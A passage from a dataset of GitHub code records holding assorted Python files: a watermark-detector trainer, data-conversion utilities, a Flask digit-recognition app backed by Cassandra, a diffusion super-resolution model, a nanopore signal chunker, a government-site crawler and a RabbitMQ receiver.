0.5).float() \n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n\n train_accuracy = 100 * correct / total\n\n model.eval()\n test_losses = []\n correct, total, tp, fp, fn, tn = 0, 0, 0, 0, 0, 0\n with torch.no_grad():\n for inputs, targets, z_score in test_dataloader:\n outputs = model((inputs.float()).cuda()).cuda()\n targets = targets.cuda()\n outputs = outputs.reshape([-1])\n loss = loss_fn(outputs, targets.float())\n test_losses.append(loss.item())\n\n # calculate acc, tp, fp, fn, tn, f1\n predicted = (outputs.data > 0.5).int() \n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n tp += (predicted & targets).sum().item()\n fp += (predicted & (~(targets.bool()))).sum().item()\n fn += ((~predicted) & targets).sum().item()\n tn += ((~predicted) & (~(targets.bool()))).sum().item()\n\n test_accuracy = 100 * correct / total\n test_tpr = 100 * tp / (tp + fn)\n test_fpr = 100 * fp / (fp + tn)\n test_tnr = 100 * tn / (fp + tn)\n test_fnr = 100 * fn / (tp + fn)\n test_f1 = 100 * 2 * tp / (2 * tp + fn + fp)\n\n print(f'Epoch: {epoch}, Train Loss: {sum(train_losses) / len(train_losses)}, Train Accuracy: {train_accuracy}%, Test Loss: {sum(test_losses) / len(test_losses)}, Test Accuracy: {test_accuracy}%, Test TPR: {test_tpr}%, Test FPR: {test_fpr}%, Test TNR: {test_tnr}%, Test FNR: {test_fnr}%, Test F1: {test_f1}%')\n\n # calculate the average acc, tpr, fpr, tnr, fnr, f1 of the last 5 epochs\n if epochs - 5 <= epoch < epochs:\n acc_avg += test_accuracy\n tpr_avg += test_tpr\n fpr_avg += test_fpr\n tnr_avg += test_tnr\n fnr_avg += test_fnr\n f1_avg += test_f1\n \n acc_avg /= 5\n tpr_avg /= 5\n fpr_avg /= 5\n tnr_avg /= 5\n fnr_avg /= 5\n f1_avg /= 5\n\n os.makedirs(os.path.dirname(output_model_dir + \"new.pt\"), exist_ok=True)\n torch.save(model.binary_classifier.state_dict(), output_model_dir + \"new.pt\")\n print(f'Test Accuracy: {acc_avg}%, Test TPR: {tpr_avg}%, Test FPR: {fpr_avg}%, Test TNR: {tnr_avg}%, Test FNR: {fnr_avg}%, Test F1: {f1_avg}%')\n\n print(\"public detector:\")\n corr_num, tot_num, tp, fp, fn, tn = 0, 0, 0, 0, 0, 0\n with open(os.path.join(_input_dir, 'test_data.jsonl'), 'r') as f:\n for line in f:\n tot_num += 1\n json_obj = json.loads(line)\n label = json_obj['Tag']\n z_score = json_obj['Z-score']\n predicted = (z_score > z_value)\n if predicted == label:\n corr_num += 1\n if predicted == 1 and label == 1:\n tp += 1\n if predicted == 1 and label == 0:\n fp += 1\n if predicted == 0 and label == 1:\n fn += 1\n if predicted == 0 and label == 0:\n tn += 1\n test_accuracy = 100 * corr_num/tot_num\n test_tpr = 100 * tp / (tp + fn)\n test_fpr = 100 * fp / (fp + tn)\n test_tnr = 100 * tn / (fp + tn)\n test_fnr = 100 * fn / (tp + fn)\n test_f1 = 100 * 2 * tp / (2 * tp + fn + fp)\n print(f'Test Accuracy: {test_accuracy}%, Test TPR: {test_tpr}%, Test FPR: {test_fpr}%, Test TNR: {test_tnr}%, Test FNR: {test_fnr}%, Test F1: {test_f1}%')\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--llm_name', type=str, default=\"gpt2\")\n parser.add_argument('--bit_number', type=int, default=4)\n parser.add_argument('--window_size', type=int, default=4)\n parser.add_argument('--input', type=str, default='data/4bit-model-key2')\n parser.add_argument('--model_file', type=str, default='model/model_parameters4.pt')\n parser.add_argument('--output_model_dir', type=str, default='model/model_parameters4.pt')\n parser.add_argument('--layers', type=int, default=4)\n parser.add_argument('--z_value', type=float, default=4.0)\n args = parser.parse_args()\n train_model(args.bit_number, args.input, args.model_file, args.output_model_dir, args.layers, args.z_value, args.llm_name)","repo_name":"THU-BPM/private_watermark","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":11407,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"36960135793","text":"import re\nimport datetime\nimport logging\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef convert_int( data ):\n if isinstance( data, int ):\n return data\n if isinstance( data, float ):\n return data\n value = data.strip()\n value = re.sub(r'\\s+', '', value) ## remove whitespaces\n try:\n return int(value)\n except ValueError:\n return value\n\n\ndef convert_float( data ):\n if isinstance( data, float ):\n return data\n if isinstance( data, int ):\n return data\n value = data.strip()\n value = value.replace(',', '.')\n value = re.sub(r'\\s+', '', value) ## remove whitespaces\n try:\n return float(value)\n except ValueError:\n ## _LOGGER.error( \"unable to convert to float: %s %s\", value, type(value) )\n return value\n\n\ndef convert_percentage( data ):\n if isinstance( data, float ):\n return data\n if isinstance( data, int ):\n return data\n value = data.strip()\n value = value.replace(',', '.')\n value = re.sub(r'\\s+', '', value) ## remove whitespaces\n value = value.replace('%', '')\n try:\n return float(value)\n except ValueError:\n return value\n\n\ndef convert_timestamp_datetime( timestamp ):\n return datetime.datetime.fromtimestamp( timestamp )\n\n\ndef is_numeric( value ):\n if isinstance(value, int):\n return True\n if isinstance(value, float):\n return True\n if isinstance(value, str):\n return value.isnumeric()\n return str(value).isnumeric()\n\n\nclass NumericFilter():\n\n def __eq__(self, other):\n return is_numeric( other )\n\n def __contains__(self, item):\n return is_numeric( item )\n\n\ndef filter_numeric( dataFrame, columnName ):\n numeric_filter = NumericFilter()\n return dataFrame[ dataFrame[ columnName ] == numeric_filter ]\n\n\ndef convert_to_float( dataFrame, columnName ):\n apply_on_column( dataFrame, columnName, convert_float )\n return filter_numeric( dataFrame, columnName )\n\n\ndef apply_on_column( dataFrame, columnName, function ):\n dataFrame[ columnName ] = dataFrame[ columnName ].apply( function )\n\n\ndef cleanup_column(dataFrame, colName):\n cleanup_column_str( dataFrame, colName, \" \" )\n cleanup_column_str( dataFrame, colName, \"\\t\" )\n cleanup_column_str( dataFrame, colName, \"\\u00A0\" ) ## non-breaking space\n cleanup_column_str( dataFrame, colName, \"\\xc2\\xa0\" ) ## non-breaking space\n\n\ndef cleanup_column_str(dataFrame, colName, substr):\n val = dataFrame.loc[ dataFrame[ colName ].str.contains( substr ), colName ]\n for index, value in val.items():\n val[ index ] = value.split( substr )[0]\n dataFrame.loc[ dataFrame[ colName ].str.contains( substr ), colName ] = val\n","repo_name":"anetczuk/stock-monitor","sub_path":"src/stockdataaccess/dataaccess/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12287509591","text":"from PIL import Image\nimport tensorflow as tf\nfrom cassandra.cluster import Cluster\nimport time\nfrom flask import Flask,request,redirect, flash\nfrom werkzeug.utils import secure_filename\nimport os\n\nimport logging\nlog = logging.getLogger()\nlog.setLevel('INFO')\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"))\nlog.addHandler(handler)\n\n\nUPLOAD_FOLDER ='/app' #'/home/hchen/桌面/project'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'JPG', 'PNG', 'bmp'])\nlocaltime = time.strftime(\"%Y-%m-%d %H:%M:%S\")\nKEYSPACE = \"imagesapce\"\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@app.route('/upload', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n f = request.files['file']\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) \n result = useModel(f.filename)\n insertValues(localtime,f.filename,result)\n return \"The number in the picture is {}\".format(result)\n \n \n return '''\n \n \n \n \n Title\n \n \n

    Please upload your picture.

    \n
    \n \n \n
    \n \n \n '''\n \ndef imageprepare(file_name):\n \"\"\"\n This function returns the pixel values.\n The input is a png file location.\n \"\"\"\n \n im = Image.open(file_name) \n im = im.convert('L') \n tv = list(im.getdata()) #get pixel values\n\n #normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.\n tva = [ (255-x)*1.0/255.0 for x in tv] \n print(tva)\n return tva\n\n \"\"\"\n This function returns the predicted integer.\n The input is the pixel values from the imageprepare() function.\n \"\"\"\n\n\n\n\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape,stddev = 0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1,shape = shape)\n return tf.Variable(initial)\n\ndef conv2d(x,W):\n return tf.nn.conv2d(x, W, strides = [1,1,1,1], padding = 'SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\ndef GetData():\n x = tf.placeholder(tf.float32, [None, 784])\n\n y_ = tf.placeholder(tf.float32, [None, 10])\n \n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n \n x_image = tf.reshape(x,[-1,28,28,1])\n \n\n h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1) + b_conv1)\n h_pool1 = max_pool_2x2(h_conv1)\n \n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n \n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n \n W_fc1 = weight_variable([7 * 7 * 64, 1024])\n b_fc1 = bias_variable([1024])\n \n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n \n keep_prob = tf.placeholder(\"float\")\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n \n W_fc2 = weight_variable([1024, 10])\n b_fc2 = bias_variable([10])\n \n y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n return y_conv, keep_prob, h_conv2, x, y_\n\ndef useModel(file_name):\n result = imageprepare(file_name)\n y_conv, keep_prob,h_conv2, x, y_ = GetData()\n cross_entropy = -tf.reduce_sum(y_*tf.log(y_conv))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n \n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver.restore(sess, \"/app/model.ckpt\") #\"/home/haochen/桌面/BigData/Docker/model.ckpt\")#这里使用了之前保存的模型参数\n #print (\"Model restored.\")\n \n prediction=tf.argmax(y_conv,1)\n predint=prediction.eval(feed_dict={x: [result],keep_prob: 1.0}, session=sess)\n print(h_conv2)\n print('result:')\n print(predint[0])\n return predint[0]\n\ndef insertValues(localtime, filename, result):\n cluster = Cluster(contact_points=['0.0.0.0'],port=9042)\n session = cluster.connect()\n try:\n\n session.execute(\"\"\"\n\n CREATE KEYSPACE %s\n\n WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '2' }\n\n \"\"\" % KEYSPACE)\n\n\n log.info(\"setting keyspace...\")\n\n session.set_keyspace(KEYSPACE)\n\n\n log.info(\"creating table...\")\n\n session.execute(\"\"\"\n\n CREATE TABLE mytable (\n\n time text,\n\n filename text,\n\n result int,\n\n PRIMARY KEY (time, filename, result)\n\n )\n\n \"\"\") \n session.execute(\"\"\"\n \n INSERT INTO mytable (time,filename,result) \n \n VALUES (%s, %s, %s)\n \n \t \"\"\" ,(localtime,filename,result))\n\n except Exception as e:\n\n log.error(\"Unable to create keyspace\")\n\n log.error(e)\n \n \n \nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80)\n","repo_name":"Ha0Chen/project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70568003025","text":"\"\"\"\nTest utilities.\n\nSince py.test discourages putting __init__.py into test directory (i.e. making tests a package)\none cannot import from anywhere under tests folder. However, some utility classes/methods might be useful\nin multiple test modules (i.e. factoryboy factories, base test classes). So this package is the place to put them.\n\"\"\"\n\nfrom mock import patch\n\nfrom edx_ace import policy\n\n\nclass StubPolicy(policy.Policy):\n def __init__(self, deny_value):\n self.deny_value = frozenset(deny_value)\n\n def check(self, message):\n return policy.PolicyResult(deny=self.deny_value)\n\n\ndef patch_policies(test_case, policies):\n patcher = patch(\n 'edx_ace.policy.policies',\n return_value=policies\n )\n patcher.start()\n test_case.addCleanup(patcher.stop)\n\n\ndef patch_channels(test_case, channels):\n patcher = patch(\n 'edx_ace.delivery.channels',\n return_value={\n c.channel_type: c for c in channels\n }\n )\n patcher.start()\n test_case.addCleanup(patcher.stop)\n","repo_name":"AlaaSwedan/edx","sub_path":"edx/app/edxapp/venvs/edxapp/lib/python2.7/site-packages/edx_ace/test_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36656792564","text":"import os\n# 项目库\nfrom loguru import logger as log\n\n\ndef get_dictionaries(directory):\n if not os.path.exists(directory):\n raise Exception('directory:{} not exist'.format(directory))\n log.info(f'dicts directory: {directory}')\n # 遍历目录一次\n root, dirs, files = next(os.walk(directory))\n dictionaries = []\n for filename in files:\n if filename.startswith('dictionary.'):\n log.debug(f'load dictionary: {filename}')\n dictionaries.append(os.path.join(root, filename))\n else:\n log.debug(f'ignore dictionary: {filename}')\n return dictionaries\n","repo_name":"zeroleo12345/radius_server_python","sub_path":"src/child_pyrad/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"75144531024","text":"import h5py\nimport os\nimport numpy as np\nfrom statsmodels import robust\nthisdir = '/media/jopu/Data/jopu/tools_raw_data/TOCR21PDG00193_xBacGS_RawData/TOCR21PDG00193_1xBacGS/raw_data/DH5a/split/'\n#find all file path of hdf5 file in dir\ndef find_HDF5(folder_dir):\n filepathes = []\n for r, d, f in os.walk(folder_dir):\n for file in f:\n if file.endswith(\".fast5\") :\n filepathes.append(os.path.join(r, file))\n return filepathes\n\ndef split_signal(fast5_data,chunk_size = 3600):\n split_raw = []\n rawpath = 'Raw/Reads/'\n try:\n raw_start = fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'].attrs['read_start_rel_to_raw']\n raw = fast5_data['Raw/Reads/']\n row_end = fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'][-1][2]+fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'][-1][3]\n for name in raw.keys():\n rawpath = rawpath+name\n\n signal = fast5_data[rawpath+'/Signal'][raw_start:]\n\n signal = (signal - np.median(signal)) / np.float64(robust.mad(signal))\n for x in range(0,row_end,chunk_size):\n Chunk = signal[()][x:x+chunk_size]\n\n if len(Chunk)==chunk_size:\n split_raw.append(Chunk)\n\n except:\n pass\n\n return split_raw\ndef split_ref(fast5_data,chunk_size = 3600,padded_length = 486):\n #container for chunked reference, single chunk of reference, reference lengthes and signal\n ref = []\n ref_row = []\n ref_lengths = []\n Chunks = []\n\n base_dict = {b'A':1,b'T':2,b'C':3,b'G':4}\n end_of_chunk = chunk_size\n\n try:\n rawpath = 'Raw/Reads/'\n raw = fast5_data['Raw/Reads/']\n for name in raw.keys():\n rawpath = rawpath+name\n raw_start = fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'].attrs['read_start_rel_to_raw']\n signal = fast5_data[rawpath+'/Signal'][raw_start:]\n #normalize signal\n signal = (signal - np.median(signal)) / np.float32(robust.mad(signal))\n except:\n pass\n try:\n for row in fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events']:\n if row[2] >= end_of_chunk-1:\n #sequence exceed padded_length will not pass\n ref.append(np.pad(ref_row,(0,padded_length-len(ref_row)),mode='constant',constant_values=5))\n ref_lengths.append(len(ref_row))\n ref_row.clear()\n #print(len(signal[()][end_of_chunk-chunk_size:end_of_chunk]),end_of_chunk,len(signal))\n Chunks.append(signal[()][end_of_chunk-chunk_size:end_of_chunk])\n end_of_chunk += chunk_size\n ref_row.append(base_dict.get(row[4]))\n\n except:\n pass\n #Chunks = np.vstack(Chunks)\n return ref_lengths,ref,Chunks\n\ndef run(folder_dir):\n filepathes = find_HDF5(folder_dir)\n Chunk = []\n Reference = []\n Reference_length = []\n for filepath in filepathes:\n try:\n fast5_data = h5py.File(filepath, 'r')\n except IOError:\n assert IOError('Error opening file. Likely a corrupted file.')\n #filter with guppy basecall mean qcosre\n if fast5_data['Analyses/Basecall_1D_000/Summary/basecall_1d_template'].attrs['mean_qscore'] > 14:\n ref_length,ref,signal = split_ref(fast5_data)\n Chunk += signal\n Reference += ref\n Reference_length += ref_length\n print(filepath)\n print(len(Reference_length),len(Reference),len(Chunk))\n np.save(\"Chunk\",Chunk)\n np.save(\"Reference\",Reference)\n np.save(\"Reference_length\",Reference_length)\n\n#print(fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'][()][4])\nrun(thisdir)\n'''\ntry:\n fast5_data = h5py.File(thisdir+\"01b0bfad-73c6-4a28-9975-9c5cc63e38bc.fast5\", 'r')\nexcept IOError:\n assert IOError('Error opening file. Likely a corrupted file.')\n\nsplit_ref(fast5_data)\n'''\n","repo_name":"jopusun/CASACAll","sub_path":"train_data.py","file_name":"train_data.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6397646997","text":"from enum import auto\r\nimport logging\r\nfrom collections import OrderedDict\r\nfrom data.util import *\r\nimport torch\r\nimport torch.nn as nn\r\nimport os\r\nimport model.networks as networks\r\nfrom .base_model import BaseModel\r\nimport random\r\nimport data.util as Util\r\nfrom .crop_validation import forward_crop\r\nlogger = logging.getLogger('base')\r\n\r\n\r\nclass DDPM(BaseModel):\r\n def __init__(self, opt):\r\n super(DDPM, self).__init__(opt)\r\n # define network and load pretrained models\r\n self.netG = self.set_device(networks.define_G(opt))\r\n self.schedule_phase = None\r\n self.device = torch.device(\r\n 'cuda')\r\n # set loss and load resume state\r\n self.set_loss()\r\n self.set_new_noise_schedule(\r\n opt['model']['beta_schedule']['train'], schedule_phase='train')\r\n if self.opt['phase'] == 'train':\r\n self.netG.train()\r\n # find the parameters to optimize\r\n if opt['model']['finetune_norm']:\r\n optim_params = []\r\n for k, v in self.netG.named_parameters():\r\n v.requires_grad = False\r\n if k.find('transformer') >= 0:\r\n v.requires_grad = True\r\n v.data.zero_()\r\n optim_params.append(v)\r\n logger.info(\r\n 'Params [{:s}] initialized to 0 and will optimize.'.format(k))\r\n else:\r\n optim_params = list(self.netG.parameters())\r\n\r\n self.optG = torch.optim.Adam(\r\n optim_params, lr=opt['train'][\"optimizer\"][\"lr\"])\r\n self.log_dict = OrderedDict()\r\n self.sub, self.div = torch.FloatTensor([0.5]).view(1, -1, 1, 1), torch.FloatTensor([0.5]).view(1, -1, 1, 1)\r\n self.load_network()\r\n self.print_network()\r\n\r\n def feed_data(self, data):\r\n \r\n\r\n data['inp'] = (data['inp'] -self.sub) / self.div\r\n data['gt'] = (data['gt'] -self.sub) / self.div\r\n p = random.random()\r\n\r\n img_lr, img_hr = data['inp'], data['gt']\r\n w_hr = round(img_lr.shape[-1] + (img_hr.shape[-1] - img_lr.shape[-1]) * p)\r\n img_hr = resize_fn(img_hr, w_hr)\r\n hr_coord, _ = Util.to_pixel_samples(img_hr)\r\n cell = torch.ones_like(hr_coord)\r\n cell[:, 0] *= 2 / img_hr.shape[-2]\r\n cell[:, 1] *= 2 / img_hr.shape[-1]\r\n hr_coord = hr_coord.repeat(img_hr.shape[0], 1, 1)\r\n cell = cell.repeat(img_hr.shape[0], 1, 1)\r\n \r\n data = {\r\n 'inp': img_lr,\r\n 'coord': hr_coord,\r\n 'cell': cell,\r\n 'gt': img_hr,\r\n 'scaler': torch.from_numpy(np.array([p], dtype=np.float32)) } \r\n\r\n self.data = self.set_device(data)\r\n\r\n def optimize_parameters(self, scaler):\r\n self.optG.zero_grad()\r\n\r\n\r\n l_pix = self.netG(self.data)\r\n # need to average in multi-gpu\r\n b, c, h, w = self.data['gt'].shape\r\n l_pix = l_pix.sum()/int(b*c*h*w)\r\n\r\n l_pix.backward()\r\n self.optG.step()\r\n\r\n # set log\r\n self.log_dict['l_pix'] = l_pix.item()\r\n\r\n def test(self, crop=False, continous=False, use_ddim=False):\r\n self.netG.eval()\r\n if crop == False:\r\n with torch.no_grad():\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.SR = self.netG.module.super_resolution(\r\n self.data, continous, use_ddim)\r\n else:\r\n self.SR = self.netG.super_resolution(\r\n self.data, continous, use_ddim)\r\n else:\r\n with torch.no_grad():\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.SR = forward_crop(\r\n self.data, self.netG.module, continous, use_ddim\r\n )\r\n else:\r\n self.SR = forward_crop(\r\n self.data, self.netG, continous, use_ddim\r\n )\r\n self.netG.train()\r\n\r\n def sample(self, batch_size=1, continous=False):\r\n self.netG.eval()\r\n with torch.no_grad():\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.SR = self.netG.module.sample(batch_size, continous)\r\n else:\r\n self.SR = self.netG.sample(batch_size, continous)\r\n self.netG.train()\r\n\r\n def set_loss(self):\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.netG.module.set_loss(self.device)\r\n else:\r\n self.netG.set_loss(self.device)\r\n\r\n def set_new_noise_schedule(self, schedule_opt, schedule_phase='train'):\r\n if self.schedule_phase is None or self.schedule_phase != schedule_phase:\r\n self.schedule_phase = schedule_phase\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.netG.module.set_new_noise_schedule(\r\n schedule_opt, self.device)\r\n else:\r\n self.netG.set_new_noise_schedule(schedule_opt, self.device)\r\n\r\n def get_current_log(self):\r\n return self.log_dict\r\n\r\n def get_current_visuals(self, need_LR=True, sample=False):\r\n out_dict = OrderedDict()\r\n if sample:\r\n out_dict['SAM'] = self.SR.detach().float().cpu()\r\n else:\r\n out_dict['SR'] = self.SR.detach().float().cpu()\r\n out_dict['INF'] = self.data['inp'].detach().float().cpu()\r\n out_dict['HR'] = self.data['gt'].detach().float().cpu()\r\n if need_LR and 'LR' in self.data:\r\n out_dict['LR'] = self.data['inp'].detach().float().cpu()\r\n else:\r\n out_dict['LR'] = out_dict['INF']\r\n return out_dict\r\n\r\n def print_network(self):\r\n s, n = self.get_network_description(self.netG)\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n net_struc_str = '{} - {}'.format(self.netG.__class__.__name__,\r\n self.netG.module.__class__.__name__)\r\n else:\r\n net_struc_str = '{}'.format(self.netG.__class__.__name__)\r\n\r\n logger.info(\r\n 'Network G structure: {}, with parameters: {:,d}'.format(net_struc_str, n))\r\n logger.info(s)\r\n\r\n def save_network(self, epoch, iter_step, best=None):\r\n if best is not None:\r\n gen_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'best_{}_gen.pth'.format(best))\r\n opt_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'best_{}_opt.pth'.format(best))\r\n else:\r\n gen_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'latest_gen.pth'.format(iter_step, epoch))\r\n opt_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'latest_opt.pth'.format(iter_step, epoch))\r\n # gen\r\n network = self.netG\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n network = network.module\r\n state_dict = network.state_dict()\r\n for key, param in state_dict.items():\r\n state_dict[key] = param.cpu()\r\n torch.save(state_dict, gen_path)\r\n # opt\r\n opt_state = {'epoch': epoch, 'iter': iter_step,\r\n 'scheduler': None, 'optimizer': None}\r\n opt_state['optimizer'] = self.optG.state_dict()\r\n torch.save(opt_state, opt_path)\r\n\r\n logger.info(\r\n 'Saved model in [{:s}] ...'.format(gen_path))\r\n\r\n def load_network(self):\r\n load_path = self.opt['path']['resume_state']\r\n if load_path is not None:\r\n logger.info(\r\n 'Loading pretrained model for G [{:s}] ...'.format(load_path))\r\n gen_path = '{}_gen.pth'.format(load_path)\r\n opt_path = '{}_opt.pth'.format(load_path)\r\n if not os.path.isfile(gen_path):\r\n return\r\n # gen\r\n network = self.netG\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n network = network.module\r\n network.load_state_dict(torch.load(\r\n gen_path, map_location=torch.device('cpu')), strict=True)\r\n\r\n if self.opt['phase'] == 'train':\r\n # optimizer\r\n opt = torch.load(opt_path, map_location=torch.device('cpu'))\r\n\r\n self.begin_step = opt['iter']\r\n self.begin_epoch = opt['epoch']\r\n","repo_name":"Ree1s/IDM","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"48"} +{"seq_id":"6508733236","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [(\"data_finder\", \"0002_campaignsignup\")]\n\n operations = [\n migrations.AddField(\n model_name=\"loggedpostcode\",\n name=\"language\",\n field=models.CharField(max_length=5, blank=True),\n )\n ]\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_finder/migrations/0003_loggedpostcode_language.py","file_name":"0003_loggedpostcode_language.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"73323966867","text":"\"\"\"Initial solution to deep_add exercise\n\n08/21/2018\n\"\"\"\n\n\ndef deep_add(nested_list, start=0):\n stack = [nested_list]\n while stack:\n element = stack.pop()\n try:\n # If the element is iterable, add its children to queue\n for child in element:\n stack.append(child)\n except TypeError:\n # It's not iterable -- add it to the sum\n start += element\n return start\n","repo_name":"yilunchen27/python_morsels_solutions","sub_path":"2018_08_20_deep_add/deep_add.py","file_name":"deep_add.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13903228442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/2/26 下午3:25\n# @Author : liupan\n# @Site : \n# @File : china_law.py\n# @Software: PyCharm\n\nfrom fake_useragent import UserAgent\nfrom pyspider.libs.base_handler import *\nfrom pyspider.database.mysql.mysql_util import MysqlUtil\n\nstart_url = 'http://www.chinalaw.gov.cn/Department/node_592.html'\n\n\nclass Handler(BaseHandler):\n crawl_config = {\n }\n\n @every(minutes=24 * 60)\n def on_start(self):\n self.crawl(start_url, user_agent=UserAgent().random, callback=self.index_page)\n\n @config(age=10 * 24 * 60 * 60)\n def index_page(self, response):\n menu_title_list = response.doc('.menuTitle > dl > a').items()\n for menu_title in menu_title_list:\n menu_href = menu_title.attr('href')\n json_url = 'http://www.chinalaw.gov.cn/json/' + menu_href[-8:-5] + '_1.json'\n self.crawl(json_url, user_agent=UserAgent().random, callback=self.item_page)\n\n menu_content_list = response.doc('.menuContent > li > a').items()\n for menu_content in menu_content_list:\n menu_content_href = menu_content.attr('href')\n json_url = 'http://www.chinalaw.gov.cn/json/' + menu_content_href[-8:-5] + '_1.json'\n self.crawl(json_url, user_agent=UserAgent().random, callback=self.item_page)\n\n def item_page(self, response):\n # news_list = response.doc('.news_list > ul > li').items()\n # for news in news_list:\n # pub_date = news('dd').text()\n # news_href = news('dt > a').attr('href')\n # news_title = news('dt > a').text()\n # self.crawl(news_href, user_agent=UserAgent().random, callback=self.detail_page, save={'pub_date': pub_date, 'title': news_title})\n res_json = response.json\n for json_item in res_json:\n title = json_item.get('listtitle')\n pub_date = json_item.get('releasedate')\n news_href = 'http://www.chinalaw.gov.cn' + json_item.get('infostaticurl')\n self.crawl(news_href, user_agent=UserAgent().random, callback=self.detail_page, save={'pub_date': pub_date, 'title': title})\n\n @config(priority=2)\n def detail_page(self, response):\n content = response.doc('#content > span').html()\n if content:\n ret = {\n \"url\": response.url,\n \"title\": response.save.get('title', ''),\n \"pub_date\": response.save.get('pub_date', ''),\n \"content\": content.strip(),\n \"remark\": 'http://www.chinalaw.gov.cn'\n }\n return ret\n\n def on_result(self, result):\n if result and result['title'] and result['content']:\n sql = MysqlUtil()\n sql.insert('law', **result)\n","repo_name":"silianpan/seal-spider-demo","sub_path":"pkulaw/china_law/china_law.py","file_name":"china_law.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21350412805","text":"#!usr/bin/env python\n\nimport pika\nimport sys\n\n# create a blocking connection\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\n\nchannel = connection.channel()\n\n#declare the direct_logs exchange\nchannel.exchange_declare(exchange='direct_logs', \n type='direct')\n\n#get a new random named queue from the exchange\nresult=channel.queue_declare(exclusive=True)#make the queue auto deleted when connection gets closed\nqueue_name = result.method.queue\n\n#get the severities to listen 